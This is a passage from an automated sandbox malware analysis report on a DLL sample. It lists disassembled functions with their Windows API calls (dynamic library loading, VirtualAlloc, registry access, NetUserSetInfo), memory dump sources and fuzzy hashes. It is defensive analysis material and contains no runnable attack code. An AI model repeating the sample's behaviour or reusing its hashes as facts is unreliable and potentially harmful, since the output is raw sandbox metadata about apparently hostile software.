                                                          • Opcode ID: 2de6c06c0082ca299113b42d5527bf64b86f77828aa010fa56cfdb5699a9f8eb
                                                          • Instruction ID: cf30f3b007e41bfee70c41d9c59be6cb1b231e04fc18b526b816a338234f57c5
                                                          • Opcode Fuzzy Hash: 2de6c06c0082ca299113b42d5527bf64b86f77828aa010fa56cfdb5699a9f8eb
                                                          • Instruction Fuzzy Hash: F9C012B94112215FD724EFA4EC4C8D63A58FF44301348494DF55993211CF745840CBA0
                                                          Function 1002C040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 1002C05A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002C061
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: KERNEL32.dll$lstrlenA
                                                          • API String ID: 2574300362-1796993502
                                                          • Opcode ID: d40042b9647b32dc2987e067e8039b869b55609119aa694a870251ee838254e7
                                                          • Instruction ID: a9383731f621fe8a41141736c67f20378d25e71117364abe4445eb65d5d345b3
                                                          • Opcode Fuzzy Hash: d40042b9647b32dc2987e067e8039b869b55609119aa694a870251ee838254e7
                                                          • Instruction Fuzzy Hash: 9AC092F8401228AFDB20AFA4DCCCE8D3A68FB453463A84544FA05A1624DB381080EA64
                                                          Function 10003A30 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 233COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $u%04x
                                                          • API String ID: 0-2846719512
                                                          • Opcode ID: 1f6d89d554986cdd82fb0e2794668e6e0531af68cd05daea2109b4fdf41f23a8
                                                          • Instruction ID: 926f1c216a8361e60bc3445ae8a78ded31acc7b6cea92631c0d95b6b2ff4fbf9
                                                          • Opcode Fuzzy Hash: 1f6d89d554986cdd82fb0e2794668e6e0531af68cd05daea2109b4fdf41f23a8
                                                          • Instruction Fuzzy Hash: A8615D616083C64FF713CE289C4075BBBD9EF962D4F28C46DE9C6C724AE761854A8352
                                                          Function 10012190 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #825.MFC42(?,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121D1
                                                          • #823.MFC42(00000000,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121F6
                                                            • Part of subcall function 10012350: #540.MFC42(00000000,?,?,00000000), ref: 100123A6
                                                            • Part of subcall function 10012350: #540.MFC42(00000000,?,?,00000000), ref: 100123B3
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #540$#823#825
                                                          • String ID:
                                                          • API String ID: 3261958014-0
                                                          • Opcode ID: 103bab456209c4811671d232b7a5f097ed692de7c0e3af0ad8c5a2e5f0cf1076
                                                          • Instruction ID: a9c2cb30c09e7b4867e33a31c74d4a8efcae7c34899988356dee3da11abaa517
                                                          • Opcode Fuzzy Hash: 103bab456209c4811671d232b7a5f097ed692de7c0e3af0ad8c5a2e5f0cf1076
                                                          • Instruction Fuzzy Hash: E041C4F6B002049BDB04CF58D88452AF795EFD4260B19C56EED09DF346DA32ECA5C7A0
                                                          Function 10016150 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #825.MFC42(00000000), ref: 10016211
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989E8,000000FF), ref: 10016221
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989E8,000000FF), ref: 100161BC
                                                            • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                          • #825.MFC42(?), ref: 100162A9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823#825$Open
                                                          • String ID:
                                                          • API String ID: 2004829228-0
                                                          • Opcode ID: a3df6c7bce3bd664df55ba16d8f86235ac18ee4999ca7d059b58045d08698e69
                                                          • Instruction ID: 655c569c95988f91d5f7fefb51b338ed70fc5e4caabb49e0d06f1a21084efced
                                                          • Opcode Fuzzy Hash: a3df6c7bce3bd664df55ba16d8f86235ac18ee4999ca7d059b58045d08698e69
                                                          • Instruction Fuzzy Hash: D541E176604A498BC708DE28DC91A6FB3D6EFC8610F88052CF9169B341DB36E949C792
                                                          Function 10015DF0 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #825.MFC42(00000000), ref: 10015EB1
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989A8,000000FF), ref: 10015EC1
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989A8,000000FF), ref: 10015E5C
                                                            • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                          • #825.MFC42(?), ref: 10015F49
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823#825$Open
                                                          • String ID:
                                                          • API String ID: 2004829228-0
                                                          • Opcode ID: 863086ceb577e8e046724670400955c95caf26373fbb0ee98028dd31d456795c
                                                          • Instruction ID: cedb9f63144fabbe78c5edae6aed69d825cba5acb3989a48cb4ee401e1e45e39
                                                          • Opcode Fuzzy Hash: 863086ceb577e8e046724670400955c95caf26373fbb0ee98028dd31d456795c
                                                          • Instruction Fuzzy Hash: C5410275604645CBC708DE28C891A6BB3D5FBC8611F88052CF9568F341EB36EA49C793
                                                          Function 10015C20 Relevance: 6.1, APIs: 4, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #825.MFC42(00000000), ref: 10015CE3
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,10098988), ref: 10015CF7
                                                          • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,10098988), ref: 10015C88
                                                            • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                          • #825.MFC42(00000000), ref: 10015D76
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823#825$Open
                                                          • String ID:
                                                          • API String ID: 2004829228-0
                                                          • Opcode ID: 5309c18a2858c9b49ac7718b0067aba9fcdb32927d4bedb7ac87393c1f69e640
                                                          • Instruction ID: b91cf90c60bfa160540cd2bc78dccd14f81ed57a779dc01a0b2f0f75c84c237b
                                                          • Opcode Fuzzy Hash: 5309c18a2858c9b49ac7718b0067aba9fcdb32927d4bedb7ac87393c1f69e640
                                                          • Instruction Fuzzy Hash: EF41FD35604A45DFC708DE28D89166FB3E6FBC8610F88052CF9469B351DB36E989CB92
                                                          Function 10002820 Relevance: 6.1, APIs: 4, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$strstr
                                                          • String ID:
                                                          • API String ID: 3700887599-0
                                                          • Opcode ID: 1feb712d2eb87b772129509cba575338db839c6f83ad0c279dda09971329dd7f
                                                          • Instruction ID: e7a3bb7836f99c4b21098aa8e2ae082227a5993f95023b9609139f1e4e40139e
                                                          • Opcode Fuzzy Hash: 1feb712d2eb87b772129509cba575338db839c6f83ad0c279dda09971329dd7f
                                                          • Instruction Fuzzy Hash: 1721AD3A2105180B871CC97DAC1152B7AC2FBC9631B6A432EFA2BC7BD1DEA5DD058380
                                                          Function 10006D50 Relevance: 6.1, APIs: 4, Instructions: 106libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 10006D7E
                                                          • LoadLibraryA.KERNEL32(?), ref: 10006D9A
                                                            • Part of subcall function 100069B0: GetProcessHeap.KERNEL32(00000000,?,?), ref: 100069C0
                                                            • Part of subcall function 100069B0: HeapReAlloc.KERNEL32(00000000), ref: 100069C7
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 10006E08
                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 10006E2F
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapRead$AddressAllocLibraryLoadProcProcess
                                                          • String ID:
                                                          • API String ID: 2932169029-0
                                                          • Opcode ID: 0bb20e24d639ff234c6774ad8937788d10a102b94a8500d5cb44c64d04d593d7
                                                          • Instruction ID: 24d0788afd7e564c21ce07679b2cd919d25d482a3edf121e110520330544f2d5
                                                          • Opcode Fuzzy Hash: 0bb20e24d639ff234c6774ad8937788d10a102b94a8500d5cb44c64d04d593d7
                                                          • Instruction Fuzzy Hash: 2C317E76B007069FE310CF29CC80A56B7E9FF493A4B26462AE919C7255EB31E815CB90
                                                          Function 10001D50 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ceil.MSVCRT ref: 10001D8C
                                                          • _ftol.MSVCRT ref: 10001D95
                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,?,?,?,?,?,?,1001B646,?,000003C0), ref: 10001DA9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual_ftolceil
                                                          • String ID:
                                                          • API String ID: 3317677364-0
                                                          • Opcode ID: a938f9c99390067515d5bb401682070dd3e948cd9475bed688cee5d7a00ad51b
                                                          • Instruction ID: 80e73f680275ecb85cea3faadb907318f444ef36128b6434ffe1c43a84600ab4
                                                          • Opcode Fuzzy Hash: a938f9c99390067515d5bb401682070dd3e948cd9475bed688cee5d7a00ad51b
                                                          • Instruction Fuzzy Hash: 9911E4757083009BE704DF28EC8275ABBE4FBC03A1F04853EFD498B395DA75A809CA65
                                                          Function 10001E20 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _ftolceil
                                                          • String ID:
                                                          • API String ID: 2006273141-0
                                                          • Opcode ID: c13413cdfef608f17b66785ed65de3a9914b1a525c6f880948e7d8bc7dc34384
                                                          • Instruction ID: 62e5b31a19e4efc706719f2d7f8223bc0b5f5341a1f9df7ec71081677a67e64d
                                                          • Opcode Fuzzy Hash: c13413cdfef608f17b66785ed65de3a9914b1a525c6f880948e7d8bc7dc34384
                                                          • Instruction Fuzzy Hash: 2911A2756483049BE704EF28EC8676FBBE1FB84791F04853DF9498B344DA36A818C666
                                                          Function 10015A40 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LocalSize.KERNEL32(00000000), ref: 10015AAE
                                                          • LocalFree.KERNEL32(00000000), ref: 10015ABA
                                                          • LocalSize.KERNEL32(00000000), ref: 10015AD5
                                                          • LocalFree.KERNEL32(00000000), ref: 10015AE1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$FreeSize
                                                          • String ID:
                                                          • API String ID: 2726095061-0
                                                          • Opcode ID: c0206f096c02150c192f086eedc162ceac66f92a3276f0c0eb43a5dbeb93a699
                                                          • Instruction ID: 9d4eaa0da794f1e2b3889d11efc9f421fde940f342979db69ca44634e0eb0258
                                                          • Opcode Fuzzy Hash: c0206f096c02150c192f086eedc162ceac66f92a3276f0c0eb43a5dbeb93a699
                                                          • Instruction Fuzzy Hash: 2E11EEB9204654DBC221DB14CC91BBFB3D8FF85251F880629F9915F281DF39EC8586AA
                                                          Function 10006F00 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,00000000,00000000,?,10006B17,00000000), ref: 10006F50
                                                          • VirtualFree.KERNEL32(5D5E5FC0,00000000,00008000,?,10006B17,00000000), ref: 10006F77
                                                          • GetProcessHeap.KERNEL32(00000000,10006B17,?,10006B17,00000000), ref: 10006F80
                                                          • HeapFree.KERNEL32(00000000), ref: 10006F87
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Free$Heap$LibraryProcessVirtual
                                                          • String ID:
                                                          • API String ID: 548792435-0
                                                          • Opcode ID: 9122a4d877bc4996ce9b38b24836df32d42650a468764ef7b8b38eca707a3637
                                                          • Instruction ID: eb7fda223cfc753f1fed3d2c8a6d49319030a12fba69635afc4c9d01848446bd
                                                          • Opcode Fuzzy Hash: 9122a4d877bc4996ce9b38b24836df32d42650a468764ef7b8b38eca707a3637
                                                          • Instruction Fuzzy Hash: E8112A756007129BE720CF69DC84F57B3E9BF48790F154A28F56AD7694DB30F8418B60
                                                          Function 10025220 Relevance: 6.1, APIs: 4, Instructions: 52sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mbstowcs.MSVCRT ref: 10025257
                                                          • NetUserSetInfo.NETAPI32(00000000,?,000003F0,?,00000000,?,?,?), ref: 1002528E
                                                          • Sleep.KERNEL32(00000064,00000000,?,000003F0,?,00000000,?,?,?), ref: 100252B2
                                                            • Part of subcall function 10025700: LocalSize.KERNEL32(00000000), ref: 10025710
                                                            • Part of subcall function 10025700: LocalFree.KERNEL32(00000000,?,10025C00,00000001,?,00000000,00000001,?,?), ref: 10025720
                                                          • LocalFree.KERNEL32(?,?,?,?), ref: 100252C4
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
